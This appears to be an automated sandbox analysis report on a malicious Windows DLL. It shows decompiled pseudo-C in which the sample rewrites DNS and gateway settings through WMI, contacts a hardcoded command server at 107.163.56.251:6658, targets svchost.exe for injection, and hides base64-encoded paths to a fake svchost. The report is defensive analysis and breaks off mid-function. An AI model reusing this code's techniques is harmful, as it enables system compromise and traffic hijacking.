0x100073e6
0x100073e6
0x100073e6
0x100073ec
0x100073f9
0x100073ff
0x10007403
0x10007408
0x10007415
0x10007417
0x1000741d
0x10007426
0x1000741f
0x10007421
0x10007421
0x10007429
0x1000742e
0x10007434
0x10007434
0x10007430
0x10007430
0x10007430
0x10007436
0x1000743a
0x1000744a
0x1000744d
0x10007452
0x10007454
0x10007454
0x1000745d
0x10007462
0x10007467
0x10007469
0x1000746c
0x10007472
0x10007474
0x10007474
0x10007472
0x1000730e
0x100072f5
0x1000747c
0x1000748b
0x1000748e
0x100075dc
0x100075dc
0x100075df
0x100075e2
0x100075e4
0x100075e9
0x100075e9
0x00000000
0x100075e2
0x10007494
0x10007497
0x1000749c
0x1000749f
0x00000000
0x00000000
0x100074a5
0x100074ab
0x100074ac
0x100074b1
0x100074b6
0x100074b8
0x100074c3
0x100074c9
0x100074ca
0x100074cb
0x100074cc
0x100074cf
0x100074d6
0x100074db
0x100074e1
0x100074e5
0x100074ea
0x100074ed
0x100074f3
0x100074f9
0x100074f9
0x100074f5
0x100074f5
0x100074f5
0x100074fb
0x100074fe
0x10007501
0x10007503
0x10007509
0x10007509
0x10007505
0x10007505
0x10007505
0x1000750b
0x10007518
0x1000751d
0x10007524
0x1000752a
0x10007532
0x10007538
0x10007540
0x10007542
0x10007548
0x1000754e
0x1000754e
0x1000754a
0x1000754a
0x1000754a
0x10007550
0x10007553
0x10007558
0x1000755d
0x10007560
0x10007563
0x10007567
0x10007569
0x1000756b
0x1000756b
0x10007570
0x1000757d
0x1000757f
0x10007585
0x1000758b
0x1000758b
0x10007587
0x10007587
0x10007587
0x1000758d
0x10007592
0x10007598
0x10007598
0x10007594
0x10007594
0x10007594
0x1000759a
0x100075ac
0x100075af
0x100075b4
0x100075b6
0x100075bb
0x100075bb
0x100075be
0x100075c3
0x100075c5
0x100075ca
0x100075ca
0x100075cd
0x100075d2
0x100075d4
0x100075d9
0x100075d9
0x100075d2
0x00000000
0x100074b8
0x1000747e
0x10007481
0x10007488
0x10007489
0x00000000
0x00000000
0x00000000
0x10007489

APIs

SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
VariantInit.OLEAUT32(?), ref: 1000735E
SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
VariantInit.OLEAUT32(?), ref: 10007388

Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2

SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
VariantInit.OLEAUT32(?), ref: 10007524

Strings

DNSServerSearchOrder, xrefs: 1000752A
IPEnabled=TRUE, xrefs: 10007237
SetDNSServerSearchOrder, xrefs: 100074AC, 10007570
Index, xrefs: 1000726E
GatewayCostMetric, xrefs: 100073CF
DefaultIPGateway, xrefs: 1000738D
SetGateways, xrefs: 10007302, 10007408
Win32_NetworkAdapterConfiguration, xrefs: 1000723C
Win32_NetworkAdapterConfiguration.Index=, xrefs: 100072B8

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArrayCreateSafe
String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
API String ID: 2640012081-1668994663
Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10005989 Relevance: 25.6, APIs: 4, Strings: 13, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
				intOrPtr _t17;
				void* _t20;
				CHAR* _t35;
				intOrPtr* _t39;
				CHAR* _t43;

				_t50 = __eflags;
				_t32 = __edx;
				_t27 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__ecx);
				_push(__ebx);
				_push(__ebp);
				_push(__esi);
				_push(__edi);
				wsprintfA("12071239", "%s", "12071239");
				0x10031e13();
				 *_t34(0, "C:\\Windows\\SysWOW64\\rundll32.exe", 0x104);
				_t43 = "C:\\Users\\alfons\\Desktop\\abc.dll";
				 *_t34( *0x10016adc, _t43, 0x104);
				_t35 = "C:\\Users\\alfons\\Desktop";
				E1000CD0E(_t27, _t35);
				0x100426e9(_t43);
				asm("arpl [eax+0x57530020], ax");
				wsprintfA("C:\\Users\\alfons\\Desktop\\12071239", "%s\\%s", _t35, 0x5c);
				wsprintfA("C:\\Users\\alfons\\Desktop\\version.txt", "%s\\version.txt", _t35);
				_t17 = E1000CCAE(wsprintfA("M107.163.56.251:6658", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, _t35,  *0x1000e248, _t43, _t50, __fp0, 0x84);
				_a16 = _t17;
				_a28 = _a28 & 0x00000000;
				_t51 = _t17;
				if(_t17 == 0) {
					_t39 = 0;
					__eflags = 0;
				} else {
					_t27 = _t17;
					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
				}
				_a28 = _a28 | 0xffffffff;
				_t6 = _t39 + 0x44; // 0x44
				E1000CD0E(_t27, "ECF4BB570DC9");
				if(_t39 != 0) {
					 *((intOrPtr*)( *_t39))(1);
				}
				_t20 = 1;
				 *[fs:0x0] = _a20;
				return _t20;
			}

0x10005989
0x10005989
0x10005989
0x1000598e
0x10005993
0x10005994
0x10005995
0x10005996
0x100059a2
0x100059ae
0x100059b1
0x100059c6
0x100059c9
0x100059d5
0x100059d7
0x100059de
0x100059e6
0x100059eb
0x100059fb
0x10005a08
0x10005a20
0x10005a28
0x10005a2c
0x10005a31
0x10005a33
0x10005a40
0x10005a40
0x10005a35
0x10005a35
0x10005a3c
0x10005a3c
0x10005a42
0x10005a47
0x10005a50
0x10005a59
0x10005a61
0x10005a61
0x10005a69
0x10005a6e
0x10005a76

APIs

wsprintfA.USER32 ref: 100059AE
wsprintfA.USER32 ref: 100059FB
wsprintfA.USER32 ref: 10005A08
wsprintfA.USER32 ref: 10005A19

Strings

C:\Users\user\Desktop, xrefs: 100059D7, 100059DD, 100059E5, 100059FD
M107.163.56.251:6658, xrefs: 10005A14
12071239, xrefs: 1000599D, 100059A3
C:\Users\user\Desktop\12071239, xrefs: 100059F6
%s\%s, xrefs: 100059F1
M%s, xrefs: 10005A0F
C:\Users\user\Desktop\abc.dll, xrefs: 100059C9, 100059CE, 100059DC
%s\version.txt, xrefs: 100059FE
107.163.56.251:6658, xrefs: 10005A0A
ECF4BB570DC9, xrefs: 10005A4B
12071239, xrefs: 100059A9
C:\Users\user\Desktop\version.txt, xrefs: 10005A03
C:\Windows\SysWOW64\rundll32.exe, xrefs: 100059BF

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$12071239$C:\Users\user\Desktop$C:\Users\user\Desktop\12071239$C:\Users\user\Desktop\abc.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB570DC9$M%s$M107.163.56.251:6658
API String ID: 2111968516-2543497288
Opcode ID: 63d324a4be31bdf7c4dbae9d94317d43bbbd32c0b7fea88a460601dc2efd78e7
Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
Opcode Fuzzy Hash: 63d324a4be31bdf7c4dbae9d94317d43bbbd32c0b7fea88a460601dc2efd78e7
Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66

Uniqueness

Uniqueness Score: -1.00%

Function 10004D36 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				void* _t104;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr* _t143;
				intOrPtr* _t145;
				void* _t146;
				void* _t148;
				intOrPtr* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t163;
				signed int _t165;
				intOrPtr _t173;
				void* _t206;
				void* _t214;
				void* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t225;

				_t245 = __fp0;
				_t227 = __eflags;
				_t202 = __edi;
				_t161 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				E1000CD20(0x182c, __ecx);
				 *((intOrPtr*)(_t220 - 0x20)) = 0;
				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
				_t223 = _t222 + 0xc;
				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
				_push(cs);
				_push( *((intOrPtr*)(_t220 + 8)));
				 *((intOrPtr*)(_t220 - 0x18)) = 0;
				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
				 *(_t220 - 4) = 0;
				if(_t102 == 0) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 =  *_t102;
				}
				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
				_t214 = _t220 - 0x18;
				_t198 =  *_t163;
				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
				_t164 =  *((intOrPtr*)(_t220 + 8));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				_t229 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					E1000515C(_t104, _t164);
				}
				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
				_t215 = L"SELECT * FROM ";
				_t165 = 7;
				memcpy(_t220 - 0x838, _t215, _t165 << 2);
				asm("movsw");
				_t206 = _t220 - 0x81a;
				memset(_t206, 0, 0x1ec << 2);
				_t225 = _t223 + 0x18;
				_t207 = _t206 + 0x1ec;
				asm("stosw");
				 *((intOrPtr*)(_t220 - 0x10)) = 0;
				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
				_push(_t220 - 0x838);
				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
				 *(_t220 - 4) = 1;
				_t230 = _t111;
				if(_t111 == 0) {
					_t216 = 0;
					__eflags = 0;
				} else {
					_t216 =  *_t111;
				}
				_push("WQL");
				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
				 *(_t220 - 4) = 2;
				if(_t113 == 0) {
					_t173 = 0;
					__eflags = 0;
				} else {
					_t173 =  *_t113;
				}
				_t114 =  *((intOrPtr*)(_t220 - 0x18));
				_t199 =  *_t114;
				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
				_t174 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					_t115 = E1000515C(_t115, _t174);
					 *((intOrPtr*)(_t220 + 8)) = 0;
				}
				_t175 =  *((intOrPtr*)(_t220 - 0x28));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
					_t115 = E1000515C(_t115, _t175);
				}
				 *((intOrPtr*)(_t220 - 0x24)) = 0;
				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
					L32:
					_pop(_t217);
					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
					 *_t217(_t220 - 0x48);
					 *_t217(_t220 - 0x38);
					_t121 =  *((intOrPtr*)(_t220 - 0x18));
					 *((intOrPtr*)( *_t121 + 8))(_t121);
					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
					 *((intOrPtr*)( *_t123 + 8))(_t123);
					_t125 =  *((intOrPtr*)(_t220 - 0x10));
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					_t127 =  *((intOrPtr*)(_t220 - 0x14));
					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
					return  *((intOrPtr*)(_t220 - 0x20));
				} else {
					_t219 =  *0x1000e230;
					while(1) {
						_push(_t220 - 0x24);
						_t175 = _t220 - 0x14;
						_push(_t220 - 0x14);
						_push(1);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t220 - 0x10)));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
							goto L32;
						}
						 *_t219(_t220 - 0x48);
						 *_t219(_t220 - 0x38);
						 *_t219(_t220 - 0x68);
						_t139 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)(_t220 - 0x30)) = 0;
						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
						_t141 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
						_t143 =  *((intOrPtr*)(_t220 - 0x14));
						_t199 = _t220 - 0x68;
						_t175 =  *_t143;
						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
						_t236 =  *((intOrPtr*)(_t220 - 0x30));
						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
							 *(_t220 - 0x58) = 0;
							_push( *((intOrPtr*)(_t220 - 0x40)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
							_t186 =  *_t145;
							 *(_t220 - 4) = 3;
							if( *_t145 == 0) {
								_t146 = 0;
								__eflags = 0;
							} else {
								_t146 = E10005189(_t186, _t199, _t245);
							}
							_push(_t146);
							_t148 = E1000CD0E(_t186, _t220 - 0x58);
							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
							_t189 =  *((intOrPtr*)(_t220 + 8));
							if( *((intOrPtr*)(_t220 + 8)) != 0) {
								E1000515C(_t148, _t189);
								 *((intOrPtr*)(_t220 + 8)) = 0;
							}
							_t115 = _t220 - 0x58;
							0x10033fcb(_t115, "svchost.exe");
							_t239 = _t115;
							_t175 = _t219;
							if(_t115 == 0) {
								 *((char*)(_t220 - 0x1838)) = 0;
								_push( *((intOrPtr*)(_t220 - 0x30)));
								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
								_t225 = _t225 + 0xc;
								asm("stosw");
								asm("stosb");
								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
								_t194 =  *_t150;
								 *(_t220 - 4) = 4;
								if( *_t150 == 0) {
									_t151 = 0;
									__eflags = 0;
								} else {
									_t151 = E10005189(_t194, _t199, _t245);
								}
								_push(_t151);
								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
								_t175 =  *((intOrPtr*)(_t220 + 0xc));
								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
									E1000515C(_t153, _t175);
									 *((intOrPtr*)(_t220 + 0xc)) = 0;
								}
								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
								asm("fild dword [ebp-0x74f98b40]");
								_t220 = _t220 + 1;
								_t115 =  *0x39e04589;
							}
						}
						_t243 =  *((intOrPtr*)(_t220 - 0x10));
						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
							continue;
						} else {
							goto L32;
						}
					}
					goto L32;
				}
			}

0x10004d36
0x10004d36
0x10004d36
0x10004d36
0x10004d3b
0x10004d45
0x10004d56
0x10004d59
0x10004d5e
0x10004d64
0x10004d75
0x10004d7d
0x10004d8e
0x10004d93
0x10004d94
0x10004d9a
0x10004da2
0x10004da4
0x10004da9
0x10004daf
0x10004daf
0x10004dab
0x10004dab
0x10004dab
0x10004db1
0x10004db4
0x10004db9
0x10004dc2
0x10004dc5
0x10004dc8
0x10004dcc
0x10004dce
0x10004dd0
0x10004dd0
0x10004de3
0x10004dea
0x10004def
0x10004df6
0x10004df8
0x10004e01
0x10004e0a
0x10004e0a
0x10004e0a
0x10004e0c
0x10004e14
0x10004e19
0x10004e26
0x10004e2f
0x10004e31
0x10004e38
0x10004e3a
0x10004e40
0x10004e40
0x10004e3c
0x10004e3c
0x10004e3c
0x10004e42
0x10004e4f
0x10004e51
0x10004e57
0x10004e5d
0x10004e5d
0x10004e59
0x10004e59
0x10004e59
0x10004e5f
0x10004e67
0x10004e6e
0x10004e71
0x10004e76
0x10004e78
0x10004e7d
0x10004e7d
0x10004e80
0x10004e83
0x10004e89
0x10004e8b
0x10004e8b
0x10004e93
0x10004e96
0x10004fff
0x10004fff
0x10005000
0x10005009
0x1000500f
0x10005011
0x10005017
0x1000501a
0x10005020
0x10005023
0x10005029
0x1000502c
0x10005035
0x10005044
0x1000504c
0x10004e9c
0x10004e9c
0x10004ea2
0x10004ea8
0x10004ea9
0x10004eae
0x10004eaf
0x10004eb1
0x10004eb3
0x10004ebb
0x00000000
0x00000000
0x10004ec5
0x10004ecb
0x10004ed1
0x10004ed3
0x10004edc
0x10004ee8
0x10004eeb
0x10004efd
0x10004f00
0x10004f04
0x10004f08
0x10004f12
0x10004f15
0x10004f18
0x10004f23
0x10004f26
0x10004f29
0x10004f2a
0x10004f2b
0x10004f2c
0x10004f31
0x10004f32
0x10004f37
0x10004f39
0x10004f42
0x10004f4b
0x10004f4b
0x10004f44
0x10004f44
0x10004f44
0x10004f4d
0x10004f52
0x10004f57
0x10004f5d
0x10004f62
0x10004f64
0x10004f69
0x10004f69
0x10004f6c
0x10004f76
0x10004f7c
0x10004f7e
0x10004f7f
0x10004f8c
0x10004f92
0x10004f95
0x10004f95
0x10004f97
0x10004f9c
0x10004f9d
0x10004fa2
0x10004fa4
0x10004fad
0x10004fb6
0x10004fb6
0x10004faf
0x10004faf
0x10004faf
0x10004fb8
0x10004fc0
0x10004fc5
0x10004fcb
0x10004fd0
0x10004fd2
0x10004fd7
0x10004fd7
0x10004fe6
0x10004feb
0x10004ff1
0x10004ff2
0x10004ff2
0x10004f7f
0x10004ff6
0x10004ff9
0x00000000
0x00000000
0x00000000
0x00000000
0x10004ff9
0x00000000
0x10004ea2

APIs

VariantInit.OLEAUT32(00000000), ref: 10004EC5
VariantInit.OLEAUT32(?), ref: 10004ECB
VariantInit.OLEAUT32(000000FF), ref: 10004ED1

Strings

SELECT * FROM , xrefs: 10004DEA, 10004E18
svchost.exe -k NetworkService, xrefs: 10004FE0
svchost.exe, xrefs: 10004F6F
WQL, xrefs: 10004E42
CommandLine, xrefs: 10004EF7
ProcessID, xrefs: 10004F0C
Name, xrefs: 10004EE2

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant
String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
API String ID: 1927566239-2685825574
Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void _v67;
				char _v68;
				void _v327;
				char _v328;
				char _v587;
				char _v588;
				void _v4683;
				signed char _v4684;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t47;
				void* _t48;
				void* _t49;
				signed int _t52;
				signed int _t56;
				void* _t58;
				void* _t67;
				void* _t71;
				void* _t79;

				_t79 = __eflags;
				_t60 = __edx;
				_t51 = __ecx;
				E1000CD20(0x1248, __ecx);
				E100051D3(_t51, __edx, _t79, __fp0);
				_v68 = _v68 & 0x00000000;
				_t52 = 0xf;
				memset( &_v67, 0, _t52 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
				_v4684 = _v4684 & 0x00000000;
				memset( &_v4683, 0, 0x3ff << 2);
				asm("stosw");
				asm("stosb");
				E10005318(0, _t79,  &_v4684);
				_v328 = _v328 & 0x00000000;
				_t56 = 0x40;
				_v588 = _v588 & 0x00000000;
				memset( &_v327, 0, _t56 << 2);
				asm("stosw");
				asm("stosb");
				_t58 = 0x40;
				_t67 =  &_v587;
				memset(_t67, 0, 0 << 2);
				_t68 = _t67 + _t58;
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
				0x10038f08( &_v328, 0);
				asm("insd");
				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
				_push(L"Win32_process");
				_push(L"ROOT\\CIMv2");
				 *0x10015fd4 = 0;
				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
				_t80 = _t47;
				if(_t47 != 0) {
					_push(_t47);
					_push(0);
					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
					 *0x10015ff4 = _t47;
					if(_t47 != 0) {
						_t48 =  *0x10015fd8; // 0x0
						 *_t48 = 0;
						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
						 *0x10015fd4 =  *0x10015fd4 + 1;
						return _t49;
					}
				}
				return _t47;
			}

0x1000570f
0x1000570f
0x1000570f
0x10005717
0x1000571f
0x10005724
0x1000572a
0x10005736
0x10005738
0x10005744
0x1000574f
0x10005751
0x10005765
0x10005767
0x10005769
0x10005771
0x10005776
0x1000577f
0x10005788
0x1000578f
0x10005791
0x10005793
0x10005798
0x10005799
0x1000579f
0x1000579f
0x100057a1
0x100057a3
0x100057b1
0x100057c5
0x100057d4
0x100057d9
0x100057e8
0x100057ed
0x100057f2
0x100057f7
0x100057fd
0x10005805
0x10005807
0x10005809
0x1000580a
0x10005811
0x10005818
0x1000581d
0x1000581f
0x10005826
0x10005835
0x1000583b
0x00000000
0x1000583b
0x1000581d
0x10005845

APIs

wsprintfA.USER32 ref: 1000574F
wsprintfA.USER32 ref: 100057B1
wsprintfA.USER32 ref: 100057C5
PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835

Strings

ROOT\CIMv2, xrefs: 100057F2
c:\windows\system32\drivers\%s\%s, xrefs: 100057BF
Win32_process, xrefs: 100057ED
c:\windows\system32\drivers\%s, xrefs: 100057AB
%s\%s, xrefs: 10005749

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf$CreateFilePrintThread
String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
API String ID: 1788855648-1421401311
Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91

Uniqueness

Uniqueness Score: -1.00%

Function 10004351 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 64
sleepCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t21;
				void* _t23;
				void* _t27;
				signed int _t29;
				void* _t31;
				char* _t38;
				void* _t40;
				void* _t41;
				signed int _t43;
				void* _t48;
				intOrPtr* _t49;
				CHAR** _t52;
				void* _t54;
				intOrPtr* _t55;

				_t60 = __fp0;
				_t47 = __edx;
				_t39 = __ecx;
				_t52 = "cmd.exe";
				0x10032ab5(__eax, _a8, _t52);
				_t59 = __eax;
				if(__eax == 0) {
					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
					if(__eflags != 0) {
						E10004318(_t19, __ecx, _a4);
						 *_t55 = 0x7d0;
						Sleep(??);
						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
						_pop(_t49);
						0x10041fa9();
						_pop(_t40);
						 *_t49(_t21);
						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
						_t41 = 1;
						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
						_t27 =  *_t49();
